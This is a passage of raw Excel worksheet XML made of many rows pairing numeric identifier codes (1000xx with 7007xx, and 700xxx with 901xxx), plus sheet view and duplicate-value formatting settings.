      <c r="A71" s="3">
        <v>100037</v>
      </c>
      <c r="B71" s="5">
        <v>700702</v>
      </c>
      <c r="D71" s="3"/>
      <c r="E71" s="5"/>
    </row>
    <row r="72" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A72" s="3">
        <v>100038</v>
      </c>
      <c r="B72" s="3">
        <v>700154</v>
      </c>
      <c r="D72" s="3"/>
      <c r="E72" s="3"/>
    </row>
    <row r="73" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A73" s="3">
        <v>100038</v>
      </c>
      <c r="B73" s="5">
        <v>700702</v>
      </c>
      <c r="D73" s="3"/>
      <c r="E73" s="5"/>
    </row>
    <row r="74" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A74" s="3">
        <v>100039</v>
      </c>
      <c r="B74" s="3">
        <v>700154</v>
      </c>
      <c r="D74" s="3"/>
      <c r="E74" s="3"/>
    </row>
    <row r="75" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A75" s="3">
        <v>100039</v>
      </c>
      <c r="B75" s="5">
        <v>700701</v>
      </c>
      <c r="D75" s="3"/>
      <c r="E75" s="5"/>
    </row>
    <row r="76" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A76" s="3">
        <v>100039</v>
      </c>
      <c r="B76" s="5">
        <v>700702</v>
      </c>
      <c r="D76" s="3"/>
      <c r="E76" s="5"/>
    </row>
    <row r="77" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A77" s="3">
        <v>100040</v>
      </c>
      <c r="B77" s="3">
        <v>700154</v>
      </c>
      <c r="D77" s="3"/>
      <c r="E77" s="3"/>
    </row>
    <row r="78" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A78" s="3">
        <v>100040</v>
      </c>
      <c r="B78" s="5">
        <v>700701</v>
      </c>
      <c r="D78" s="3"/>
      <c r="E78" s="5"/>
    </row>
    <row r="79" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A79" s="3">
        <v>100040</v>
      </c>
      <c r="B79" s="5">
        <v>700702</v>
      </c>
      <c r="D79" s="3"/>
      <c r="E79" s="5"/>
    </row>
    <row r="80" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A80" s="3">
        <v>100041</v>
      </c>
      <c r="B80" s="3">
        <v>700154</v>
      </c>
      <c r="D80" s="3"/>
      <c r="E80" s="3"/>
    </row>
    <row r="81" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A81" s="3">
        <v>100041</v>
      </c>
      <c r="B81" s="3">
        <v>700702</v>
      </c>
      <c r="D81" s="3"/>
      <c r="E81" s="3"/>
    </row>
    <row r="82" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A82" s="3">
        <v>100042</v>
      </c>
      <c r="B82" s="3">
        <v>700154</v>
      </c>
      <c r="D82" s="3"/>
      <c r="E82" s="3"/>
    </row>
    <row r="83" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A83" s="3">
        <v>100042</v>
      </c>
      <c r="B83" s="5">
        <v>700701</v>
      </c>
      <c r="D83" s="3"/>
      <c r="E83" s="5"/>
    </row>
    <row r="84" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A84" s="3">
        <v>100043</v>
      </c>
      <c r="B84" s="3">
        <v>700154</v>
      </c>
      <c r="D84" s="3"/>
      <c r="E84" s="3"/>
    </row>
    <row r="85" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A85" s="3">
        <v>100043</v>
      </c>
      <c r="B85" s="5">
        <v>700701</v>
      </c>
      <c r="D85" s="3"/>
      <c r="E85" s="5"/>
    </row>
    <row r="86" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A86" s="3">
        <v>100044</v>
      </c>
      <c r="B86" s="3">
        <v>700154</v>
      </c>
      <c r="D86" s="3"/>
      <c r="E86" s="3"/>
    </row>
    <row r="87" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A87" s="3">
        <v>100044</v>
      </c>
      <c r="B87" s="5">
        <v>700701</v>
      </c>
      <c r="D87" s="3"/>
      <c r="E87" s="5"/>
    </row>
    <row r="88" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A88" s="3">
        <v>100044</v>
      </c>
      <c r="B88" s="3">
        <v>700702</v>
      </c>
      <c r="D88" s="3"/>
      <c r="E88" s="3"/>
    </row>
    <row r="89" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A89" s="3">
        <v>100045</v>
      </c>
      <c r="B89" s="3">
        <v>700154</v>
      </c>
      <c r="D89" s="3"/>
      <c r="E89" s="3"/>
    </row>
    <row r="90" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A90" s="3">
        <v>100045</v>
      </c>
      <c r="B90" s="5">
        <v>700701</v>
      </c>
      <c r="D90" s="3"/>
      <c r="E90" s="5"/>
    </row>
    <row r="91" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A91" s="3">
        <v>100045</v>
      </c>
      <c r="B91" s="3">
        <v>700702</v>
      </c>
      <c r="D91" s="3"/>
      <c r="E91" s="3"/>
    </row>
    <row r="92" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A92" s="3">
        <v>100046</v>
      </c>
      <c r="B92" s="3">
        <v>700154</v>
      </c>
      <c r="D92" s="3"/>
      <c r="E92" s="3"/>
    </row>
    <row r="93" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A93" s="3">
        <v>100046</v>
      </c>
      <c r="B93" s="5">
        <v>700701</v>
      </c>
      <c r="D93" s="3"/>
      <c r="E93" s="5"/>
    </row>
    <row r="94" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A94" s="3">
        <v>100046</v>
      </c>
      <c r="B94" s="3">
        <v>700702</v>
      </c>
      <c r="D94" s="3"/>
      <c r="E94" s="3"/>
    </row>
    <row r="95" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A95" s="3">
        <v>100047</v>
      </c>
      <c r="B95" s="3">
        <v>700154</v>
      </c>
      <c r="D95" s="3"/>
      <c r="E95" s="3"/>
    </row>
    <row r="96" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A96" s="3">
        <v>100047</v>
      </c>
      <c r="B96" s="3">
        <v>700702</v>
      </c>
      <c r="D96" s="3"/>
      <c r="E96" s="3"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <conditionalFormatting sqref="H3">
    <cfRule type="duplicateValues" dxfId="11" priority="2"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2:E96">
    <cfRule type="duplicateValues" dxfId="1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1C567-D977-454D-B41D-20D6EF967A40}">
  <dimension ref="A1:H7424"/>
  <sheetViews>
    <sheetView topLeftCell="A7411" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="G7416" sqref="G7416"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="2" max="2" width="13" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A2" s="5">
        <v>700066</v>
      </c>
      <c r="B2" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="C2"/>
      <c r="D2" s="5"/>
      <c r="E2" s="3"/>
    </row>
    <row r="3" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A3" s="5">
        <v>700066</v>
      </c>
      <c r="B3" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="C3"/>
      <c r="D3" s="5"/>
      <c r="E3" s="3"/>
    </row>
    <row r="4" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A4" s="5">
        <v>700066</v>
      </c>
      <c r="B4" s="3">
        <v>901083</v>
      </c>
      <c r="C4"/>
      <c r="D4" s="5"/>
      <c r="E4" s="3"/>
    </row>
    <row r="5" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A5" s="5">
        <v>700066</v>
      </c>
      <c r="B5" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="C5"/>
      <c r="D5" s="5"/>
      <c r="E5" s="3"/>
    </row>
    <row r="6" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A6" s="5">
        <v>700065</v>
      </c>
      <c r="B6" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="C6"/>
      <c r="D6" s="5"/>
      <c r="E6" s="3"/>
    </row>
    <row r="7" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A7" s="5">
        <v>700065</v>
      </c>
      <c r="B7" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="C7"/>
      <c r="D7" s="5"/>
      <c r="E7" s="3"/>
    </row>
    <row r="8" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A8" s="5">
        <v>700065</v>
      </c>
      <c r="B8" s="3">
        <v>901083</v>
      </c>
      <c r="C8"/>
      <c r="D8" s="5"/>
      <c r="E8" s="3"/>
    </row>
    <row r="9" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A9" s="5">
        <v>700065</v>
      </c>
      <c r="B9" s="3">
        <v>901057</v>
      </c>
      <c r="C9"/>
      <c r="D9" s="5"/>
      <c r="E9" s="3"/>
    </row>
    <row r="10" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A10" s="5">
        <v>700065</v>
      </c>
      <c r="B10" s="3">
        <v>901082</v>
      </c>
      <c r="C10"/>
      <c r="D10" s="5"/>
      <c r="E10" s="3"/>
    </row>
    <row r="11" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A11" s="5">
        <v>700469</v>
      </c>
      <c r="B11" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="C11"/>
      <c r="D11" s="5"/>
      <c r="E11" s="3"/>
    </row>
    <row r="12" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A12" s="5">
        <v>700469</v>
      </c>
      <c r="B12" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="C12"/>
      <c r="D12" s="5"/>
      <c r="E12" s="3"/>
    </row>
    <row r="13" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A13" s="5">
        <v>700469</v>
      </c>
      <c r="B13" s="3">
        <v>901140</v>
      </c>
      <c r="C13"/>
      <c r="D13" s="5"/>
      <c r="E13" s="3"/>
    </row>
    <row r="14" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A14" s="5">
        <v>700469</v>
      </c>
      <c r="B14" s="3">
        <v>901105</v>
      </c>
      <c r="C14"/>
      <c r="D14" s="5"/>
      <c r="E14" s="3"/>
    </row>
    <row r="15" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A15" s="5">
        <v>700469</v>
      </c>
      <c r="B15" s="3">
        <v>901027.00300000003</v>
      </c>
      <c r="C15"/>
      <c r="D15" s="5"/>
      <c r="E15" s="3"/>
    </row>
    <row r="16" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A16" s="5">
        <v>700469</v>
      </c>
      <c r="B16" s="3">
        <v>901055</v>
      </c>
      <c r="C16"/>
      <c r="D16" s="5"/>
      <c r="E16" s="3"/>
    </row>
    <row r="17" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A17" s="5">
        <v>700469</v>
      </c>
      <c r="B17" s="3">
        <v>901518</v>
      </c>
      <c r="C17"/>
      <c r="D17" s="5"/>
      <c r="E17" s="3"/>
    </row>
    <row r="18" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A18" s="5">
        <v>700202</v>
      </c>
      <c r="B18" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="C18"/>
      <c r="D18" s="5"/>
      <c r="E18" s="3"/>
    </row>
    <row r="19" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A19" s="5">
        <v>700202</v>
      </c>
      <c r="B19" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="C19"/>
      <c r="D19" s="5"/>
      <c r="E19" s="3"/>
    </row>
    <row r="20" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A20" s="5">
        <v>700202</v>
      </c>
      <c r="B20" s="3">
        <v>901546.00300000003</v>
      </c>
      <c r="C20"/>
      <c r="D20" s="5"/>
      <c r="E20" s="3"/>
    </row>
    <row r="21" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A21" s="5">
        <v>700552</v>
      </c>
      <c r="B21" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="C21"/>
      <c r="D21" s="5"/>
      <c r="E21" s="3"/>
    </row>
    <row r="22" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A22" s="5">
        <v>700552</v>
      </c>
      <c r="B22" s="3">
        <v>901482</v>
      </c>
      <c r="C22"/>
      <c r="D22" s="5"/>
      <c r="E22" s="3"/>
    </row>
    <row r="23" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A23" s="5">
        <v>700552</v>
      </c>
      <c r="B23" s="3">
        <v>901069.00199999998</v>
      </c>
      <c r="C23"/>
      <c r="D23" s="5"/>
      <c r="E23" s="3"/>
    </row>
    <row r="24" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A24" s="5">
        <v>700552</v>
      </c>
      <c r="B24" s="3">
        <v>901018</v>
      </c>
      <c r="C24"/>
      <c r="D24" s="5"/>
      <c r="E24" s="3"/>
    </row>
    <row r="25" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A25" s="5">
        <v>700552</v>
      </c>
      <c r="B25" s="3">
        <v>901016</v>
      </c>
      <c r="C25"/>
      <c r="D25" s="5"/>
      <c r="E25" s="3"/>
    </row>
    <row r="26" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A26" s="5">
        <v>700309</v>
      </c>
      <c r="B26" s="3">
        <v>901433</v>
      </c>
      <c r="C26"/>
      <c r="D26" s="5"/>
      <c r="E26" s="3"/>
    </row>
    <row r="27" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A27" s="5">
        <v>700309</v>
      </c>
      <c r="B27" s="3">
        <v>901432</v>
      </c>
      <c r="C27"/>
      <c r="D27" s="5"/>
      <c r="E27" s="3"/>
    </row>
    <row r="28" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A28" s="5">
        <v>700309</v>
      </c>
      <c r="B28" s="3">
        <v>901412</v>
      </c>
      <c r="C28"/>
      <c r="D28" s="5"/>
      <c r="E28" s="3"/>
    </row>
    <row r="29" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A29" s="5">
        <v>700309</v>
      </c>
      <c r="B29" s="3">
        <v>901430</v>
      </c>
      <c r="C29"/>
      <c r="D29" s="5"/>
      <c r="E29" s="3"/>
    </row>
    <row r="30" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A30" s="5">
        <v>700309</v>
      </c>
      <c r="B30" s="3">
        <v>901474</v>
      </c>
      <c r="C30"/>
      <c r="D30" s="5"/>
      <c r="E30" s="3"/>
    </row>
    <row r="31" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A31" s="5">
        <v>700045</v>
      </c>
      <c r="B31" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="C31"/>
      <c r="D31" s="5"/>
      <c r="E31" s="3"/>
    </row>
    <row r="32" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A32" s="5">
        <v>700045</v>
      </c>
      <c r="B32" s="3">
        <v>901560</v>
      </c>
      <c r="C32"/>
      <c r="D32" s="5"/>
      <c r="E32" s="3"/>
    </row>
    <row r="33" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A33" s="5">
        <v>700045</v>
      </c>
      <c r="B33" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="C33"/>
      <c r="D33" s="5"/>
      <c r="E33" s="3"/>
    </row>
    <row r="34" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A34" s="5">
        <v>700045</v>
      </c>
      <c r="B34" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="C34"/>
      <c r="D34" s="5"/>
      <c r="E34" s="3"/>
    </row>
    <row r="35" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A35" s="5">
        <v>700045</v>
      </c>
      <c r="B35" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="C35"/>
      <c r="D35" s="5"/>
      <c r="E35" s="3"/>
    </row>
    <row r="36" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A36" s="5">
        <v>700045</v>
      </c>
      <c r="B36" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="C36"/>
      <c r="D36" s="5"/>
      <c r="E36" s="3"/>
    </row>
    <row r="37" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A37" s="5">
        <v>700045</v>
      </c>
      <c r="B37" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="C37"/>
      <c r="D37" s="5"/>
      <c r="E37" s="3"/>
    </row>
    <row r="38" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A38" s="5">
        <v>700045</v>
      </c>
      <c r="B38" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="C38"/>
      <c r="D38" s="5"/>
      <c r="E38" s="3"/>
    </row>
    <row r="39" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A39" s="5">
        <v>700045</v>
      </c>
      <c r="B39" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="C39"/>
      <c r="D39" s="5"/>
      <c r="E39" s="3"/>
    </row>
    <row r="40" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A40" s="5">
        <v>700045</v>
      </c>
      <c r="B40" s="3">
        <v>901546.01500000001</v>
      </c>
      <c r="C40"/>
      <c r="D40" s="5"/>
      <c r="E40" s="3"/>
    </row>
    <row r="41" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A41" s="5">
        <v>700045</v>
      </c>
      <c r="B41" s="3">
        <v>901041</v>
      </c>
      <c r="C41"/>
      <c r="D41" s="5"/>
      <c r="E41" s="3"/>
    </row>
    <row r="42" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A42" s="5">
        <v>700045</v>
      </c>
      <c r="B42" s="3">
        <v>901083</v>
      </c>
      <c r="C42"/>
      <c r="D42" s="5"/>
      <c r="E42" s="3"/>
    </row>
    <row r="43" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A43" s="5">
        <v>700045</v>
      </c>
      <c r="B43" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D43" s="5"/>
      <c r="E43" s="3"/>
    </row>
    <row r="44" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A44" s="5">
        <v>700045</v>
      </c>
      <c r="B44" s="25">
        <v>901056.00100000005</v>
      </c>
      <c r="C44"/>
      <c r="D44" s="5"/>
      <c r="E44" s="25"/>
    </row>
    <row r="45" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A45" s="5">
        <v>700045</v>
      </c>
      <c r="B45" s="3">
        <v>901112</v>
      </c>
      <c r="C45"/>
      <c r="D45" s="5"/>
      <c r="E45" s="3"/>
    </row>
    <row r="46" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A46" s="5">
        <v>700045</v>
      </c>
      <c r="B46" s="3">
        <v>901106</v>
      </c>
      <c r="C46"/>
      <c r="D46" s="5"/>
      <c r="E46" s="3"/>
    </row>
    <row r="47" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A47" s="5">
        <v>700045</v>
      </c>
      <c r="B47" s="3">
        <v>901027</v>
      </c>
      <c r="C47"/>
      <c r="D47" s="5"/>
      <c r="E47" s="3"/>
    </row>
    <row r="48" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A48" s="5">
        <v>700045</v>
      </c>
      <c r="B48" s="3">
        <v>901120</v>
      </c>
      <c r="C48"/>
      <c r="D48" s="5"/>
      <c r="E48" s="3"/>
    </row>
    <row r="49" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A49" s="5">
        <v>700045</v>
      </c>
      <c r="B49" s="3">
        <v>901057</v>
      </c>
      <c r="C49"/>
      <c r="D49" s="5"/>
      <c r="E49" s="3"/>
    </row>
    <row r="50" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A50" s="5">
        <v>700045</v>
      </c>
      <c r="B50" s="3">
        <v>901012</v>
      </c>
      <c r="C50"/>
      <c r="D50" s="5"/>
      <c r="E50" s="3"/>
    </row>
    <row r="51" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A51" s="5">
        <v>700045</v>
      </c>
      <c r="B51" s="3">
        <v>901029</v>
      </c>
      <c r="C51"/>
      <c r="D51" s="5"/>
      <c r="E51" s="3"/>
    </row>
    <row r="52" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A52" s="5">
        <v>700045</v>
      </c>
      <c r="B52" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="C52"/>
      <c r="D52" s="5"/>
      <c r="E52" s="3"/>
    </row>
    <row r="53" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A53" s="5">
        <v>700045</v>
      </c>
      <c r="B53" s="3">
        <v>901082</v>
      </c>
      <c r="C53"/>
      <c r="D53" s="5"/>
      <c r="E53" s="3"/>
    </row>
    <row r="54" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A54" s="5">
        <v>700440</v>
      </c>
      <c r="B54" s="3">
        <v>901418</v>
      </c>
      <c r="C54"/>
      <c r="D54" s="5"/>
      <c r="E54" s="3"/>
    </row>
    <row r="55" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A55" s="5">
        <v>700440</v>
      </c>
      <c r="B55" s="3">
        <v>901577</v>
      </c>
      <c r="C55"/>
      <c r="D55" s="5"/>
      <c r="E55" s="3"/>
    </row>
    <row r="56" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A56" s="5">
        <v>700440</v>
      </c>
      <c r="B56" s="3">
        <v>901447</v>
      </c>
      <c r="C56"/>
      <c r="D56" s="5"/>
      <c r="E56" s="3"/>
    </row>
    <row r="57" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A57" s="5">
        <v>700440</v>
      </c>
      <c r="B57" s="3">
        <v>901476</v>
      </c>
      <c r="C57"/>
      <c r="D57" s="5"/>
      <c r="E57" s="3"/>
    </row>
    <row r="58" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A58" s="5">
        <v>700440</v>
      </c>
      <c r="B58" s="3">
        <v>901404</v>
      </c>
      <c r="C58"/>
      <c r="D58" s="5"/>
      <c r="E58" s="3"/>
    </row>
    <row r="59" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A59" s="5">
        <v>700440</v>
      </c>
      <c r="B59" s="3">
        <v>901472</v>
      </c>
      <c r="C59"/>
      <c r="D59" s="5"/>
      <c r="E59" s="3"/>
    </row>
    <row r="60" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A60" s="5">
        <v>700440</v>
      </c>
      <c r="B60" s="3">
        <v>901444</v>
      </c>
      <c r="C60"/>
      <c r="D60" s="5"/>
      <c r="E60" s="3"/>
    </row>
    <row r="61" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A61" s="5">
        <v>700440</v>
      </c>
      <c r="B61" s="3">
        <v>901406</v>
      </c>
      <c r="C61"/>
      <c r="D61" s="5"/>
      <c r="E61" s="3"/>
    </row>
    <row r="62" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A62" s="5">
        <v>700440</v>
      </c>
      <c r="B62" s="3">
        <v>901424</v>
      </c>
      <c r="C62"/>
      <c r="D62" s="5"/>
      <c r="E62" s="3"/>
    </row>
    <row r="63" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A63" s="5">
        <v>700440</v>
      </c>
      <c r="B63" s="3">
        <v>901508</v>
      </c>
      <c r="C63"/>
      <c r="D63" s="5"/>
      <c r="E63" s="3"/>
    </row>
    <row r="64" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A64" s="5">
        <v>700331</v>
      </c>
      <c r="B64" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="C64"/>
      <c r="D64" s="5"/>
      <c r="E64" s="3"/>
    </row>
    <row r="65" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A65" s="5">
        <v>700331</v>
      </c>
      <c r="B65" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="C65"/>
      <c r="D65" s="5"/>
      <c r="E65" s="3"/>
    </row>
    <row r="66" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A66" s="5">
        <v>700331</v>
      </c>
      <c r="B66" s="3">
        <v>901071.00300000003</v>
      </c>
      <c r="C66"/>
      <c r="D66" s="5"/>
      <c r="E66" s="3"/>
    </row>
    <row r="67" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A67" s="5">
        <v>700331</v>
      </c>
      <c r="B67" s="3">
        <v>901560</v>
      </c>
      <c r="C67"/>
      <c r="D67" s="5"/>
      <c r="E67" s="3"/>
    </row>
    <row r="68" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A68" s="5">
        <v>700331</v>
      </c>
      <c r="B68" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="C68"/>
      <c r="D68" s="5"/>
      <c r="E68" s="3"/>
    </row>
    <row r="69" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A69" s="5">
        <v>700331</v>
      </c>
      <c r="B69" s="3">
        <v>901185</v>
      </c>
      <c r="C69"/>
      <c r="D69" s="5"/>
      <c r="E69" s="3"/>
    </row>
    <row r="70" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A70" s="5">
        <v>700331</v>
      </c>
      <c r="B70" s="3">
        <v>901115</v>
      </c>
      <c r="C70"/>
      <c r="D70" s="5"/>
      <c r="E70" s="3"/>
    </row>
    <row r="71" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A71" s="5">
        <v>700331</v>
      </c>
      <c r="B71" s="3">
        <v>901555</v>
      </c>
      <c r="C71"/>
      <c r="D71" s="5"/>
      <c r="E71" s="3"/>
    </row>
    <row r="72" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A72" s="5">
        <v>700331</v>
      </c>
      <c r="B72" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="C72"/>
      <c r="D72" s="5"/>
      <c r="E72" s="3"/>
    </row>
    <row r="73" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A73" s="5">
        <v>700331</v>
      </c>
      <c r="B73" s="3">
        <v>901140</v>
      </c>
      <c r="C73"/>
      <c r="D73" s="5"/>
      <c r="E73" s="3"/>
    </row>
    <row r="74" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A74" s="5">
        <v>700331</v>
      </c>
      <c r="B74" s="3">
        <v>901048.00300000003</v>
      </c>
      <c r="C74"/>
      <c r="D74" s="5"/>
      <c r="E74" s="3"/>
    </row>
    <row r="75" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A75" s="5">
        <v>700331</v>
      </c>
      <c r="B75" s="3">
        <v>901203</v>
      </c>
      <c r="C75"/>
      <c r="D75" s="5"/>
      <c r="E75" s="3"/>
    </row>
    <row r="76" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A76" s="5">
        <v>700331</v>
      </c>
      <c r="B76" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="C76"/>
      <c r="D76" s="5"/>
      <c r="E76" s="3"/>
    </row>
    <row r="77" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A77" s="5">
        <v>700331</v>
      </c>
      <c r="B77" s="3">
        <v>901564.00300000003</v>
      </c>
      <c r="C77"/>
      <c r="D77" s="5"/>
      <c r="E77" s="3"/>
    </row>
    <row r="78" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A78" s="5">
        <v>700331</v>
      </c>
      <c r="B78" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="C78"/>
      <c r="D78" s="5"/>
      <c r="E78" s="3"/>
    </row>
    <row r="79" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A79" s="5">
        <v>700331</v>
      </c>
      <c r="B79" s="3">
        <v>901105</v>
      </c>
      <c r="C79"/>
      <c r="D79" s="5"/>
      <c r="E79" s="3"/>
    </row>
    <row r="80" spans="1:5" s="1" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A80" s="5">
        <v>700331</v>
      </c>
      <c r="B80" s="3">
        <v>901112</v>
      </c>
      <c r="C80"/>
